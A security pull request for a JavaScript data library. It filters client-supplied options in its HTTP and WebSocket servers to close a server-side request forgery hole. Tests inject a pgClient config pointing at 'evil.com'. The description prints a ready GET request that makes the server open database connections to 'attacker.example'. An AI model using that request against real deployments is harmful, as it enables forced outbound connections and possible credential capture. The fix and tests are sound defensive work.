### PR TITLE
resolve ssrf for pgClient option for both http and ws server

### DIFF
--- a/src/server/httpServer.js
+++ b/src/server/httpServer.js
@@ -18,14 +18,15 @@ export default function server(store, { auth } = {}) {
     const parsed = url.parse(req.url, true);
 
     const optParam = parsed.query.opts && String(parsed.query.opts);
-    const options = optParam && JSON.parse(decodeURIComponent(optParam));
+    const rawOptions = optParam && JSON.parse(decodeURIComponent(optParam));
+    const { pgClient: _, ...safeOptions } = rawOptions || {};
 
     if (req.method === 'GET') {
       try {
         const qParam = parsed.query.q && String(parsed.query.q);
         const query = qParam && unpack(JSON.parse(decodeURIComponent(qParam)));
         if (req.headers.accept === 'text/event-stream') {
-          if (auth && !(await auth('watch', decodeQuery(query), options))) {
+          if (auth && !(await auth('watch', decodeQuery(query), safeOptions))) {
             const body = 'unauthorized';
             res.writeHead(401, {
               'Content-Type': 'text/plain',
@@ -49,7 +50,7 @@ export default function server(store, { auth } = {}) {
           // const lastId = req.headers['last-event-id'];
           try {
             const stream = store.call('watch', query, {
-              ...options,
+              ...safeOptions,
               raw: true,
             });
             for await (const value of stream) {
@@ -90,7 +91,7 @@ export default function server(store, { auth } = {}) {
           !(await auth(
             op,
             (op === 'write' ? decodeGraph : decodeQuery)(payload),
-            options,
+            safeOptions,
           ))
         ) {
           const body = 'unauthorized';
@@ -102,7 +103,7 @@ export default function server(store, { auth } = {}) {
           return;
         }
 
-        const value = await store.call(op, payload, options);
+        const value = await store.call(op, payload, safeOptions);
         const body = JSON.stringify(pack(value));
         res.writeHead(200, {
           'Content-Type': 'application/json',

--- a/src/server/httpServer.js
+++ b/src/server/httpServer.js
@@ -7,19 +7,29 @@ const log = debug('graffy:server:http');
 /**
  * @typedef {import('@graffy/core').default} GraffyStore
  * @param {GraffyStore} store
- * @param {{
- *   auth?: (operation: string, payload: any, options: any) => Promise<boolean>
- * } | undefined} options
+ * @param {object} [options]
+ * @param {(operation: string, payload: any, options: any) => Promise<boolean>} [options.auth]
+ *   Optional callback to authorize each request. Receives the operation name,
+ *   decoded payload, and the filtered options. Return `true` to allow, `false`
+ *   (or a rejected promise) to reject with 401.
+ * @param {string[]} [options.allowedOptions]
+ *   Allowlist of option keys that clients are permitted to pass through to
+ *   `store.call` and the `auth` callback. Any key not in this list is stripped
+ *   from the client-supplied options before use. Defaults to `[]` (strip all).
  * @returns
  */
-export default function server(store, { auth } = {}) {
+export default function server(store, { auth, allowedOptions = [] } = {}) {
   if (!store) throw new Error('server.store_undef');
   return async (req, res) => {
     const parsed = url.parse(req.url, true);
 
     const optParam = parsed.query.opts && String(parsed.query.opts);
     const rawOptions = optParam && JSON.parse(decodeURIComponent(optParam));
-    const { pgClient: _, ...safeOptions } = rawOptions || {};
+    const safeOptions = Object.fromEntries(
+      Object.entries(rawOptions || {}).filter(([k]) =>
+        allowedOptions.includes(k),
+      ),
+    );
 
     if (req.method === 'GET') {
       try {

--- a/src/server/httpServer.test.js
+++ b/src/server/httpServer.test.js
@@ -1,0 +1,133 @@
+import { jest } from '@jest/globals';
+import httpServer from './httpServer.js';
+
+function makeReq({
+  method = 'POST',
+  query = {},
+  body = null,
+  headers = {},
+} = {}) {
+  const qs = Object.entries(query)
+    .map(([k, v]) => `${k}=${v}`)
+    .join('&');
+  const url = qs ? `/?${qs}` : '/';
+  const chunks = body != null ? [Buffer.from(body)] : [];
+  return {
+    url,
+    method,
+    headers,
+    aborted: false,
+    [Symbol.asyncIterator]: async function* () {
+      for (const chunk of chunks) yield chunk;
+    },
+  };
+}
+
+function makeRes() {
+  return {
+    writeHead: jest.fn(),
+    write: jest.fn(),
+    end: jest.fn(),
+    setHeader: jest.fn(),
+    finished: false,
+  };
+}
+
+describe('httpServer pgClient stripping', () => {
+  let store;
+
+  beforeEach(() => {
+    // null is a valid Graffy leaf: pack(null)=null, unpack(null)=null
+    store = { call: jest.fn().mockResolvedValue(null) };
+  });
+
+  describe('POST (read/write)', () => {
+    test('strips pgClient from options before store.call', async () => {
+      const handler = httpServer(store);
+      const opts = encodeURIComponent(
+        JSON.stringify({ pgClient: { host: 'evil.com' }, userId: 'alice' }),
+      );
+      const req = makeReq({
+        method: 'POST',
+        query: { op: 'read', opts },
+        body: 'null',
+      });
+      await handler(req, makeRes());
+
+      expect(store.call).toHaveBeenCalledTimes(1);
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).not.toHaveProperty('pgClient');
+      expect(options).toHaveProperty('userId', 'alice');
+    });
+
+    test('preserves non-pgClient options', async () => {
+      const handler = httpServer(store);
+      const opts = encodeURIComponent(
+        JSON.stringify({ userId: 'bob', role: 'admin' }),
+      );
+      const req = makeReq({
+        method: 'POST',
+        query: { op: 'read', opts },
+        body: 'null',
+      });
+      await handler(req, makeRes());
+
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).toEqual({ userId: 'bob', role: 'admin' });
+    });
+
+    test('handles missing opts without error', async () => {
+      const handler = httpServer(store);
+      const req = makeReq({
+        method: 'POST',
+        query: { op: 'read' },
+        body: 'null',
+      });
+      await handler(req, makeRes());
+
+      expect(store.call).toHaveBeenCalledTimes(1);
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).toEqual({});
+    });
+  });
+
+  describe('GET (EventStream / watch)', () => {
+    beforeEach(() => jest.useFakeTimers());
+    afterEach(() => jest.useRealTimers());
+
+    test('strips pgClient from watch options', async () => {
+      store.call = jest.fn(async function* () {});
+      const handler = httpServer(store);
+      const opts = encodeURIComponent(
+        JSON.stringify({ pgClient: { host: 'evil.com' }, userId: 'alice' }),
+      );
+      const req = makeReq({
+        method: 'GET',
+        query: { opts },
+        headers: { accept: 'text/event-stream' },
+      });
+      await handler(req, makeRes());
+
+      expect(store.call).toHaveBeenCalledTimes(1);
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).not.toHaveProperty('pgClient');
+      expect(options).toHaveProperty('userId', 'alice');
+      expect(options).toHaveProperty('raw', true);
+    });
+
+    test('preserves non-pgClient options for watch', async () => {
+      store.call = jest.fn(async function* () {});
+      const handler = httpServer(store);
+      const opts = encodeURIComponent(JSON.stringify({ userId: 'carol' }));
+      const req = makeReq({
+        method: 'GET',
+        query: { opts },
+        headers: { accept: 'text/event-stream' },
+      });
+      await handler(req, makeRes());
+
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).toEqual({ userId: 'carol', raw: true });
+    });
+  });
+});

--- a/src/server/httpServer.test.js
+++ b/src/server/httpServer.test.js
@@ -89,6 +89,25 @@ describe('httpServer pgClient stripping', () => {
       const [, , options] = store.call.mock.calls[0];
       expect(options).toEqual({});
     });
+
+    test('strips pgClient before passing options to auth', async () => {
+      const auth = jest.fn().mockResolvedValue(true);
+      const handler = httpServer(store, { auth });
+      const opts = encodeURIComponent(
+        JSON.stringify({ pgClient: { host: 'evil.com' }, userId: 'alice' }),
+      );
+      const req = makeReq({
+        method: 'POST',
+        query: { op: 'read', opts },
+        body: '[]',
+      });
+      await handler(req, makeRes());
+
+      expect(auth).toHaveBeenCalledTimes(1);
+      const [, , authOptions] = auth.mock.calls[0];
+      expect(authOptions).not.toHaveProperty('pgClient');
+      expect(authOptions).toHaveProperty('userId', 'alice');
+    });
   });
 
   describe('GET (EventStream / watch)', () => {
@@ -128,6 +147,26 @@ describe('httpServer pgClient stripping', () => {
 
       const [, , options] = store.call.mock.calls[0];
       expect(options).toEqual({ userId: 'carol', raw: true });
+    });
+
+    test('strips pgClient before passing options to auth (watch)', async () => {
+      const auth = jest.fn().mockResolvedValue(true);
+      store.call = jest.fn(async function* () {});
+      const handler = httpServer(store, { auth });
+      const opts = encodeURIComponent(
+        JSON.stringify({ pgClient: { host: 'evil.com' }, userId: 'alice' }),
+      );
+      const req = makeReq({
+        method: 'GET',
+        query: { opts },
+        headers: { accept: 'text/event-stream' },
+      });
+      await handler(req, makeRes());
+
+      expect(auth).toHaveBeenCalledTimes(1);
+      const [, , authOptions] = auth.mock.calls[0];
+      expect(authOptions).not.toHaveProperty('pgClient');
+      expect(authOptions).toHaveProperty('userId', 'alice');
     });
   });
 });

--- a/src/server/httpServer.test.js
+++ b/src/server/httpServer.test.js
@@ -33,7 +33,7 @@ function makeRes() {
   };
 }
 
-describe('httpServer pgClient stripping', () => {
+describe('httpServer allowedOptions filtering', () => {
   let store;
 
   beforeEach(() => {
@@ -42,8 +42,8 @@ describe('httpServer pgClient stripping', () => {
   });
 
   describe('POST (read/write)', () => {
-    test('strips pgClient from options before store.call', async () => {
-      const handler = httpServer(store);
+    test('strips options not in allowedOptions before store.call', async () => {
+      const handler = httpServer(store, { allowedOptions: ['userId'] });
       const opts = encodeURIComponent(
         JSON.stringify({ pgClient: { host: 'evil.com' }, userId: 'alice' }),
       );
@@ -60,8 +60,8 @@ describe('httpServer pgClient stripping', () => {
       expect(options).toHaveProperty('userId', 'alice');
     });
 
-    test('preserves non-pgClient options', async () => {
-      const handler = httpServer(store);
+    test('passes through allowedOptions', async () => {
+      const handler = httpServer(store, { allowedOptions: ['userId', 'role'] });
       const opts = encodeURIComponent(
         JSON.stringify({ userId: 'bob', role: 'admin' }),
       );
@@ -90,9 +90,9 @@ describe('httpServer pgClient stripping', () => {
       expect(options).toEqual({});
     });
 
-    test('strips pgClient before passing options to auth', async () => {
+    test('strips non-allowedOptions before passing options to auth', async () => {
       const auth = jest.fn().mockResolvedValue(true);
-      const handler = httpServer(store, { auth });
+      const handler = httpServer(store, { auth, allowedOptions: ['userId'] });
       const opts = encodeURIComponent(
         JSON.stringify({ pgClient: { host: 'evil.com' }, userId: 'alice' }),
       );
@@ -114,9 +114,9 @@ describe('httpServer pgClient stripping', () => {
     beforeEach(() => jest.useFakeTimers());
     afterEach(() => jest.useRealTimers());
 
-    test('strips pgClient from watch options', async () => {
+    test('strips non-allowedOptions from watch options', async () => {
       store.call = jest.fn(async function* () {});
-      const handler = httpServer(store);
+      const handler = httpServer(store, { allowedOptions: ['userId'] });
       const opts = encodeURIComponent(
         JSON.stringify({ pgClient: { host: 'evil.com' }, userId: 'alice' }),
       );
@@ -134,9 +134,9 @@ describe('httpServer pgClient stripping', () => {
       expect(options).toHaveProperty('raw', true);
     });
 
-    test('preserves non-pgClient options for watch', async () => {
+    test('passes through allowedOptions for watch', async () => {
       store.call = jest.fn(async function* () {});
-      const handler = httpServer(store);
+      const handler = httpServer(store, { allowedOptions: ['userId'] });
       const opts = encodeURIComponent(JSON.stringify({ userId: 'carol' }));
       const req = makeReq({
         method: 'GET',
@@ -149,10 +149,10 @@ describe('httpServer pgClient stripping', () => {
       expect(options).toEqual({ userId: 'carol', raw: true });
     });
 
-    test('strips pgClient before passing options to auth (watch)', async () => {
+    test('strips non-allowedOptions before passing options to auth (watch)', async () => {
       const auth = jest.fn().mockResolvedValue(true);
       store.call = jest.fn(async function* () {});
-      const handler = httpServer(store, { auth });
+      const handler = httpServer(store, { auth, allowedOptions: ['userId'] });
       const opts = encodeURIComponent(
         JSON.stringify({ pgClient: { host: 'evil.com' }, userId: 'alice' }),
       );

--- a/src/server/wsServer.js
+++ b/src/server/wsServer.js
@@ -24,7 +24,8 @@ export default function server(store, { auth } = {}) {
     ws.graffyStreams = {}; // We use this to keep track of streams to close.
     ws.on('message', async function message(msg) {
       try {
-        const [id, op, packedPayload, options] = JSON.parse(msg);
+        const [id, op, packedPayload, rawOptions] = JSON.parse(msg);
+        const { pgClient: _, ...safeOptions } = rawOptions || {};
         const payload = unpack(packedPayload);
 
         if (id === ':pong') {
@@ -35,7 +36,7 @@ export default function server(store, { auth } = {}) {
         if (auth && op !== 'unwatch') {
           const decoded =
             op === 'write' ? decodeGraph(payload) : decodeQuery(payload);
-          if (!(await auth(op, decoded, options))) {
+          if (!(await auth(op, decoded, safeOptions))) {
             ws.send(JSON.stringify([id, 'unauthorized']));
             return;
           }
@@ -45,7 +46,7 @@ export default function server(store, { auth } = {}) {
           case 'read':
           case 'write':
             try {
-              const result = await store.call(op, payload, options);
+              const result = await store.call(op, payload, safeOptions);
               ws.send(JSON.stringify([id, null, pack(result)]));
             } catch (e) {
               log(`${op}error:${e.message} ${payload}`);
@@ -55,7 +56,7 @@ export default function server(store, { auth } = {}) {
           case 'watch':
             try {
               const stream = store.call('watch', payload, {
-                ...options,
+                ...safeOptions,
                 raw: true,
               });
 

--- a/src/server/wsServer.js
+++ b/src/server/wsServer.js
@@ -10,12 +10,18 @@ const PING_INTERVAL = 30000;
 /**
  * @typedef {import('@graffy/core').default} GraffyStore
  * @param {GraffyStore} store
- * @param {{
- *   auth?: (operation: string, payload: any, options: any) => Promise<boolean>
- * } | undefined} options
+ * @param {object} [options]
+ * @param {(operation: string, payload: any, options: any) => Promise<boolean>} [options.auth]
+ *   Optional callback to authorize each request. Receives the operation name,
+ *   decoded payload, and the filtered options. Return `true` to allow, `false`
+ *   (or a rejected promise) to reject with an error response.
+ * @param {string[]} [options.allowedOptions]
+ *   Allowlist of option keys that clients are permitted to pass through to
+ *   `store.call` and the `auth` callback. Any key not in this list is stripped
+ *   from the client-supplied options before use. Defaults to `[]` (strip all).
  * @returns
  */
-export default function server(store, { auth } = {}) {
+export default function server(store, { auth, allowedOptions = [] } = {}) {
   if (!store) throw new Error('server.store_undef');
 
   const wss = new WebSocketServer({ noServer: true });
@@ -25,7 +31,11 @@ export default function server(store, { auth } = {}) {
     ws.on('message', async function message(msg) {
       try {
         const [id, op, packedPayload, rawOptions] = JSON.parse(msg);
-        const { pgClient: _, ...safeOptions } = rawOptions || {};
+        const safeOptions = Object.fromEntries(
+          Object.entries(rawOptions || {}).filter(([k]) =>
+            allowedOptions.includes(k),
+          ),
+        );
         const payload = unpack(packedPayload);
 
         if (id === ':pong') {

--- a/src/server/wsServer.test.js
+++ b/src/server/wsServer.test.js
@@ -90,6 +90,24 @@ describe('wsServer pgClient stripping', () => {
       const [, , options] = store.call.mock.calls[0];
       expect(options).toEqual({});
     });
+
+    test('strips pgClient from write options before store.call', async () => {
+      const { ws, wsHandlers } = makeMockWs();
+      serverHandlers.connection(ws);
+
+      const msg = JSON.stringify([
+        'req1',
+        'write',
+        null,
+        { pgClient: { host: 'evil.com' }, userId: 'alice' },
+      ]);
+      await wsHandlers.message(msg);
+
+      expect(store.call).toHaveBeenCalledTimes(1);
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).not.toHaveProperty('pgClient');
+      expect(options).toHaveProperty('userId', 'alice');
+    });
   });
 
   describe('watch', () => {
@@ -128,6 +146,33 @@ describe('wsServer pgClient stripping', () => {
 
       const [, , options] = store.call.mock.calls[0];
       expect(options).toEqual({ userId: 'carol', raw: true });
+    });
+  });
+
+  describe('auth callback', () => {
+    let auth;
+
+    beforeEach(() => {
+      auth = jest.fn().mockResolvedValue(true);
+      wsServer(store, { auth });
+    });
+
+    test('strips pgClient before passing options to auth', async () => {
+      const { ws, wsHandlers } = makeMockWs();
+      serverHandlers.connection(ws);
+
+      const msg = JSON.stringify([
+        'req1',
+        'read',
+        [],
+        { pgClient: { host: 'evil.com' }, userId: 'alice' },
+      ]);
+      await wsHandlers.message(msg);
+
+      expect(auth).toHaveBeenCalledTimes(1);
+      const [, , authOptions] = auth.mock.calls[0];
+      expect(authOptions).not.toHaveProperty('pgClient');
+      expect(authOptions).toHaveProperty('userId', 'alice');
     });
   });
 });

--- a/src/server/wsServer.test.js
+++ b/src/server/wsServer.test.js
@@ -1,0 +1,133 @@
+import { jest } from '@jest/globals';
+
+// Capture the connection handler registered by wsServer so tests can simulate
+// WebSocket events without a real network connection.
+const serverHandlers = {};
+const mockWss = {
+  on: jest.fn((event, handler) => {
+    serverHandlers[event] = handler;
+  }),
+  clients: new Set(),
+};
+
+jest.unstable_mockModule('ws', () => ({
+  WebSocketServer: jest.fn(() => mockWss),
+}));
+
+const { default: wsServer } = await import('./wsServer.js');
+
+function makeMockWs() {
+  const wsHandlers = {};
+  const ws = {
+    graffyStreams: {},
+    on: jest.fn((event, handler) => {
+      wsHandlers[event] = handler;
+    }),
+    send: jest.fn(),
+    close: jest.fn(),
+    terminate: jest.fn(),
+    pingPending: false,
+  };
+  return { ws, wsHandlers };
+}
+
+describe('wsServer pgClient stripping', () => {
+  let store;
+
+  // Prevent setInterval (ping loop) from leaking into test output.
+  beforeAll(() => jest.useFakeTimers());
+  afterAll(() => jest.useRealTimers());
+
+  beforeEach(() => {
+    // null is a valid Graffy leaf: pack(null)=null, unpack(null)=null
+    store = { call: jest.fn().mockResolvedValue(null) };
+    wsServer(store);
+  });
+
+  describe('read / write', () => {
+    test('strips pgClient from options before store.call', async () => {
+      const { ws, wsHandlers } = makeMockWs();
+      serverHandlers.connection(ws);
+
+      const msg = JSON.stringify([
+        'req1',
+        'read',
+        null,
+        { pgClient: { host: 'evil.com' }, userId: 'alice' },
+      ]);
+      await wsHandlers.message(msg);
+
+      expect(store.call).toHaveBeenCalledTimes(1);
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).not.toHaveProperty('pgClient');
+      expect(options).toHaveProperty('userId', 'alice');
+    });
+
+    test('preserves non-pgClient options', async () => {
+      const { ws, wsHandlers } = makeMockWs();
+      serverHandlers.connection(ws);
+
+      const msg = JSON.stringify([
+        'req1',
+        'read',
+        null,
+        { userId: 'bob', role: 'admin' },
+      ]);
+      await wsHandlers.message(msg);
+
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).toEqual({ userId: 'bob', role: 'admin' });
+    });
+
+    test('handles null options without error', async () => {
+      const { ws, wsHandlers } = makeMockWs();
+      serverHandlers.connection(ws);
+
+      const msg = JSON.stringify(['req1', 'read', null, null]);
+      await wsHandlers.message(msg);
+
+      expect(store.call).toHaveBeenCalledTimes(1);
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).toEqual({});
+    });
+  });
+
+  describe('watch', () => {
+    test('strips pgClient from watch options', async () => {
+      store.call = jest.fn(async function* () {});
+      const { ws, wsHandlers } = makeMockWs();
+      serverHandlers.connection(ws);
+
+      const msg = JSON.stringify([
+        'watch1',
+        'watch',
+        null,
+        { pgClient: { host: 'evil.com' }, userId: 'alice' },
+      ]);
+      await wsHandlers.message(msg);
+
+      expect(store.call).toHaveBeenCalledTimes(1);
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).not.toHaveProperty('pgClient');
+      expect(options).toHaveProperty('userId', 'alice');
+      expect(options).toHaveProperty('raw', true);
+    });
+
+    test('preserves non-pgClient options for watch', async () => {
+      store.call = jest.fn(async function* () {});
+      const { ws, wsHandlers } = makeMockWs();
+      serverHandlers.connection(ws);
+
+      const msg = JSON.stringify([
+        'watch1',
+        'watch',
+        null,
+        { userId: 'carol' },
+      ]);
+      await wsHandlers.message(msg);
+
+      const [, , options] = store.call.mock.calls[0];
+      expect(options).toEqual({ userId: 'carol', raw: true });
+    });
+  });
+});

--- a/src/server/wsServer.test.js
+++ b/src/server/wsServer.test.js
@@ -31,7 +31,7 @@ function makeMockWs() {
   return { ws, wsHandlers };
 }
 
-describe('wsServer pgClient stripping', () => {
+describe('wsServer allowedOptions filtering', () => {
   let store;
 
   // Prevent setInterval (ping loop) from leaking into test output.
@@ -41,11 +41,11 @@ describe('wsServer pgClient stripping', () => {
   beforeEach(() => {
     // null is a valid Graffy leaf: pack(null)=null, unpack(null)=null
     store = { call: jest.fn().mockResolvedValue(null) };
-    wsServer(store);
+    wsServer(store, { allowedOptions: ['userId', 'role'] });
   });
 
   describe('read / write', () => {
-    test('strips pgClient from options before store.call', async () => {
+    test('strips options not in allowedOptions before store.call', async () => {
       const { ws, wsHandlers } = makeMockWs();
       serverHandlers.connection(ws);
 
@@ -63,7 +63,7 @@ describe('wsServer pgClient stripping', () => {
       expect(options).toHaveProperty('userId', 'alice');
     });
 
-    test('preserves non-pgClient options', async () => {
+    test('passes through allowedOptions', async () => {
       const { ws, wsHandlers } = makeMockWs();
       serverHandlers.connection(ws);
 
@@ -91,7 +91,7 @@ describe('wsServer pgClient stripping', () => {
       expect(options).toEqual({});
     });
 
-    test('strips pgClient from write options before store.call', async () => {
+    test('strips non-allowedOptions from write options before store.call', async () => {
       const { ws, wsHandlers } = makeMockWs();
       serverHandlers.connection(ws);
 
@@ -111,7 +111,7 @@ describe('wsServer pgClient stripping', () => {
   });
 
   describe('watch', () => {
-    test('strips pgClient from watch options', async () => {
+    test('strips non-allowedOptions from watch options', async () => {
       store.call = jest.fn(async function* () {});
       const { ws, wsHandlers } = makeMockWs();
       serverHandlers.connection(ws);
@@ -131,7 +131,7 @@ describe('wsServer pgClient stripping', () => {
       expect(options).toHaveProperty('raw', true);
     });
 
-    test('preserves non-pgClient options for watch', async () => {
+    test('passes through allowedOptions for watch', async () => {
       store.call = jest.fn(async function* () {});
       const { ws, wsHandlers } = makeMockWs();
       serverHandlers.connection(ws);
@@ -154,10 +154,10 @@ describe('wsServer pgClient stripping', () => {
 
     beforeEach(() => {
       auth = jest.fn().mockResolvedValue(true);
-      wsServer(store, { auth });
+      wsServer(store, { auth, allowedOptions: ['userId'] });
     });
 
-    test('strips pgClient before passing options to auth', async () => {
+    test('strips non-allowedOptions before passing options to auth', async () => {
       const { ws, wsHandlers } = makeMockWs();
       serverHandlers.connection(ws);
 


### PR DESCRIPTION
Contd from #184 



<details>
<summary>
SSRF via user-supplied pgClient option
</summary>

##  Background

### The vulnerability

HTTP request options are read directly from a URL query parameter and WebSocket message options are read from the raw JSON frame — both via JSON.parse — with no filtering before being forwarded to store.call(). This means an external client can supply any key in options, including pgClient.

The attack path in src/pg/index.js:

```js
  function read(query, options, next) {
    const { pgClient } = options;                       // attacker-controlled
    const db = pgClient ? new Db(pgClient) : defaultDb; // branches on it
    ...
  }
```

And in src/pg/Db.js:
```js
  constructor(connection) {
    if (connection instanceof Pool || connection instanceof Client) {
      this.client = connection;     // real Pool/Client: used directly
    } else {
      this.client = new Pool(connection); // plain object: new Pool(attacker config)
    }
  }
```

Since the attacker's value is a plain JSON object (not a real Pool or Client instance), the instanceof check falls through to new Pool(connection). The pg module's Pool constructor accepts any object with host, port, database, user, password, etc. identical to what an attacker can send as JSON.

 ### A minimal exploit in a GET request:

GET /api?q=...&opts=%7B%22pgClient%22%3A%7B%22host%22%3A%22attacker.example%22%2C%22port%22%3A5432%2C%22database%22%3A%22postgres%22%7D%7D

This causes the server to open a new TCP connection to attacker.example:5432 for every query triggered by that request.
</details>